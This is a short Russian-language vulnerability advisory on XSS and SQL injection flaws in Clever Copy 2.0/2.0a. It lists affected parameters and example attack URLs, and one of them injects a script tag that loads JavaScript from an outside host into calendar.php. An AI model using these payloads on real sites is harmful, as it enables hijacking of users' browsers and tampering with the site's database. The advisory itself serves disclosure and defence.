Программа: Clever Copy 2.0, 2.0a 

Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

1. Уязвимость существует при обработке входных данных в переменных 'viewuser_id' и 'group' сценария 'users.php' и при обработке параметра yr в сценарии 'calendar.php'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. 

Примеры:

http://[target]/forum/users.php?mode= viewprofile&viewuser_id=89[XSS-code] 

http://[target]/forum/users.php?mode= viewgroup&group=Moderators[XSS-code]

http://[target]/calendar.php?mth=3&yr=2006"> <script src="http://www.drorshalev.com/dev/injection/js.js"></script> 

2. Программное обеспечение некорректно обрабатывает входные данные в некоторых переменных. Удаленный пользователь может с специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. 

Примеры:

http://[target]/forum/viewattach.php? id=[SQL-Inje ction] 

http://[target]/forum/users.php?mode= viewprofile&viewuser_id=[SQL-Injection]

http://[target]/forum/viewforum.php?mode= view&id=[SQL-Injection]

http://[targ et]/forum/viewforum.php? forum=[SQL-Injection]

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии